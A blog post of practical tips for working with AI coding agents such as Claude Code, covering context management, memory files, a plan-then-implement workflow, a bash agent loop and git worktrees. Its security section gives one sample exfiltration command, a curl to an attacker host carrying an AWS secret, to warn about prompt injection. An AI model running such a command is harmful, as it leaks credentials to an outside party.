Agentic Coding Data Dump
20 February, 2026
LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some non-linear data points about the current meta, with examples using claude.
LLM Amnesia
LLMs are stateless. New session, new context window.
Context Engineering
Context engineering is keeping only the most relevant tokens in the context window for a defined task. LLMs struggle with recall in large context windows, so strive to reset at the 40%–50% mark.
Useful cheatsheet:
- To visualize your context window, run the
/contextcommand. - For Claude Code, you can run the
/clearcommand to reset the context window. - Opinionated, but I prefer to disable the
/compactfeature to control what gets compacted in the context window. - Use
/resumeto resume a previous conversation (saves convos according tocwd).
Set up a custom status line to view your context percentage in real time.
Protect Your Context
The input tokens you and your agent feed the LLM will determine its performance. View your initial new-session usage percentage via the /context command. Keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant. Stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. Also worth noting: because LLMs work via next-token prediction, don't argue with it, it just encourages statistically bad behavior. Instead, create a handoff and start over.
Layered Knowledge
When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.
In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions at packages/backend/../db/migrations/CLAUDE.md rather than in the root of the project.
Write these files yourself rather than auto-generating them, here's a good guide on writing a solid CLAUDE.md. Be sure to keep them updated. There is a skill for that.
Security
Agents cannot be trusted, and LLMs are vulnerable to prompt injections. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can run malicious commands (such as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD) and you are pwned. Be warned: the dev machine is an attack surface.
ERPI - Epic, Research, Plan, Implement Methodology
Epic
The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Ask for push-back on decisions. Tools like Wispr Flow are nice, but for a while I was just voice recording on WhatsApp and transcribing the .ogg files to text.
Research
Send a coding agent to explore and research the current codebase and relevant documentation. Review and validate the output. Research should represent the state of the current codebase, not implementation suggestions. To avoid the latter, generate a list of research questions based on the initial epic.md and send the agent off to research without any context of "why" it is researching.
Plan
The implementation plan is generated by combining research_output.md and epic.md. Review and refine it so it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity. Remember YAGNI while ensuring the system stays extendable, and again, ask for push-back on decisions!
Notes before the implementation step
Non-deterministic coding agents thrive with determinism. You can accidentally steer a model in the wrong direction. You cannot accidentally steer a type checker. Ask claude "is this code good?" and it says something entirely different every time. Same model, same code. Type checkers, unit tests, and linters give the model deterministic feedback.
Time spent building tooling infrastructure compounds as a codebase grows, so it's worth investing some time to set up. Sharpen the axe.
Implement
Once the plan is prepared and reviewed, send off the coding agent and wait for this asynchronous task to complete. To avoid permissions fatigue, run the agent in a sandboxed environment where you can let it skip permissions. If that's not possible, configure a solid set of permissions and purchase a giant enter button from China like I did.
Tips on Iterating on the Spec
Specs are contracts. When iterating over the markdown outputs, I leave XML annotations before feeding them back to the LLM to revise. I also recommend git stage-ing the previous draft so you can diff-review it after changes to confirm you haven't lost critical spec information.
# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>
Real Example from one of my codebases
Ralph Wiggum Loop
Agent control flow. Running coding agents in for-loops is a simple yet surprisingly effective method of managing context and completing large tasks.
Pseudo bash
for ((i=1; i<=prds.length; i++)); do
result=$(claude -p "@prd.json @progress.txt \
1. Pick the highest-priority unfinished feature
and implement only that one. \
2. Update the PRD and append progress
to progress.txt for the next developer. \
3. Git commit the feature. \
If the PRD is complete, output <promise>COMPLETE</promise>.")
echo "$result"
[[ "$result" == *"<promise>COMPLETE</promise>"* ]]
&& echo "PRD complete, exiting." && exit 0
done
Pseudo prompt
Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills,
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.
Pseudo tasks.json
[{
"task_description":
"Add Dark mode Button",
"steps_to_verify": [
"CSS mode changes",
"Icon toggles",
"Theme state persists through"
],
"passes": false
}]
Parallelism and Git Worktrees
Git has a built-in feature that has become very popular. Worktrees let you check out multiple branches from the same repository into separate directories simultaneously, so coding agents can work on features without stepping over each other. That's how Vibe Kanban and Cursor Agents work under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.
Closing Notes
Much of what I know comes from learning from the community and just being curious, so go out there and get your hands dirty! Run a ralph loop, write your own agent, and try new tools — but keep your setup simple and manageable, and burn all your tokens!
- Tracer bullets: Small pieces of functionality built end-to-end to validate that what you plan to do on a large scale is even possible with your approach. Read more about it here!
- MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it's better to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom
/get-ticket.shscript. - Terminal multiplexers are cool: I use tmux; here's a setup blog.
- Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
- Learning tests: Code you write not to build a feature, but to prove how an external system behaves. When working with closed-source APIs, tools, or binaries, you can ask the agent to create a test to confirm behavior. Interfaces can change, so checking and committing these tests in your CI can be beneficial for critical third-party dependencies.
- Propagating assumptions: Assumptions created during research propagate through planning and implementation. A wrong assumption discovered at implementation forces you to redo everything upstream. Learning tests catch these early, when the cost of being wrong is cheap.
Link dump:
- this post repo reference files and more
- Agent ping pong
- Ralph Wiggum - Geoffrey Huntley
- Agent autonomy
- Don't waste your back pressure
- Open University Grade Checker
- Simple Bash Agent
- What Is Sovereign AI? | NVIDIA Blog
- AI Hero
- BAML
- Gastown
- WebMCP
- Advanced Context Engineering for Coding Agents
- Haflow - A local fullstack webapp control panel for orchestrating containers
- Understanding LLM Inference Engines: Inside Nano-vLLM
- Vibe Kanban
- Fully automatic censorship removal for language models
- Agentic Engineering Patterns
- Large Scale Online Deanonymization
- AI Fatigue Is Real
- Kardashev Scale
- Wisprflow
- Mercury 2 - LLMs that are powered by diffusion